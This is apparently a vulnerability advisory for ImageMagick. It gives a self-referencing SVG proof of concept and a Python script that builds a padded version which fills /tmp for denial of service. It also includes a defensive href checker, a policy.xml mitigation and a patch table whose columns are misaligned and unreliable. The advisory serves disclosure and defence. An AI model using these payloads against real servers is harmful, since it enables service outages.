Asymmetric denial of service in ImageMagick
Description
ImageMagick: a specially crafted SVG causes a segmentation fault and leaves trash files in /tmp, which can be leveraged for a DoS.
Summary
A specially crafted SVG file causes a segmentation fault and leaves trash files in /tmp, which can be leveraged for a DoS.
Operating system, version and so on
Linux: Debian (Buster) LTS, kernel 5.10 / Parrot OS 5.1 (Electro Ara)
Tested ImageMagick version
6.9.11-60, 7.1.0-62
Details
A specially crafted SVG file references itself, so ImageMagick loads it again while rendering it and ends in a segmentation fault. A remote attacker who can get such an SVG processed (for example, by uploading it) can use this to cause a denial of service.
This appears to affect many websites: uploading the PoC file to a server that converts it with ImageMagick leaves trash files in /tmp.
I think it is better to check whether the file descriptor refers to the file itself before calling read().
PoC
Save the following as bad.svg (the image element references the file itself):
<!DOCTYPE test>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <image height="200" width="200" xlink:href="bad.svg" />
</svg>
Run some commands for verification:
$ ./magick --version
Version: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
$ ./magick convert -verbose -font OpenSymbol bad.svg t.jpg
...
Impact
Possible DoS: when ImageMagick crashes it leaves behind a lot of trash files. These files can be large if the SVG contains many render actions.
Additional impact
In a DoS attack, if a remote attacker uploads an SVG file of size t, ImageMagick generates files of total size 103*t. This means that if an attacker uploads a 100 MB SVG, the server generates about 10 GB.
Example:
$ cat dos_poc.py
# Writes bad_dos.svg: an SVG whose <image> points at the file itself, padded
# with zeros so that the file size t is about 1 MiB. The page's one-liner put
# the padding inside the href value with quoting that does not parse; it is
# placed after the element here (assumed intent) so the XML stays well-formed
# and the self-reference still resolves.
padding = "0" * (1024 * 1021)
head = (
    '<?xml version="1.0"?>\n'
    '<?xml-stylesheet href="https://example.com/style.xsl" type="text/xsl" ?>\n'
    '<!DOCTYPE test>\n'
    '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"\n'
    '     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">\n'
    '  <image height="200" width="200" href="bad_dos.svg" />\n'
)
tail = "\n</svg>\n"
with open("bad_dos.svg", "w") as f:
    f.write(head + padding + tail)
$ rm -rf /tmp/magick-*
...
P.S. If ImageMagick runs in a Docker container, this attack will crash the server that Docker runs on, because the size of the Docker container keeps increasing.
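The self-reference check suggested in the Details section can also be applied to uploads before ImageMagick ever sees them. The following is an added example for this advisory, not ImageMagick's own code: it parses an SVG with the Python standard library and flags every <image> whose href is not a data: URI, reporting a href that names the upload itself as a self-reference; the sample inputs are constructed from the PoC above.

```python
"""Pre-upload check for the self-referencing <image> href used in this report.

Added example, not ImageMagick code. Flags <image> hrefs that would make the
renderer read a file or URL; a href naming the upload itself is the PoC loop.
"""
import xml.etree.ElementTree as ET

SVG_IMAGE = "{http://www.w3.org/2000/svg}image"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"


def unsafe_image_refs(svg_bytes: bytes, own_name: str) -> list:
    """Return one finding per <image> href that is not inline data."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    findings = []
    for elem in root.iter():
        if elem.tag not in (SVG_IMAGE, "image"):   # namespaced or bare <image>
            continue
        href = elem.get("href") or elem.get(XLINK_HREF)
        if href is None:
            continue
        target = href.strip()
        if target.lower().startswith("data:"):
            continue                                # inline data, nothing to fetch
        if target.rsplit("/", 1)[-1] == own_name:
            findings.append("self-referencing <image> href=%r" % target)
        else:
            findings.append("external <image> href=%r" % target)
    return findings


# Constructed inputs: the report's bad.svg, and a harmless inline-image SVG.
POC_SELF_REF = b"""<!DOCTYPE test>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <image height="200" width="200" xlink:href="bad.svg" />
</svg>"""

SAFE_INLINE = b"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <image width="1" height="1" href="data:image/png;base64,iVBORw0KGgo=" />
</svg>"""

if __name__ == "__main__":
    print(unsafe_image_refs(POC_SELF_REF, "bad.svg"))
    print(unsafe_image_refs(SAFE_INLINE, "ok.svg"))
```

On the ImageMagick side this complements a policy.xml rule such as `<policy domain="coder" rights="none" pattern="SVG" />`, which stops the SVG coder from being invoked at all where uploads never need SVG rendering.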
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
| Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
| debian 12 | 8:6.9.11.60+dfsg-1.6+deb12u1 | | |
| debian 14 | 8:6.9.12.98+dfsg1-2 | | |
| debian 13 | 8:6.9.12.98+dfsg1-2 | | |
| debian 11 | 8:6.9.11.60+dfsg-1.3+deb11u3 | | |
| nuget | 13.0.0 | | |
| rpm rhel6 | - | - | |
| rpm rhel7 | - | - | |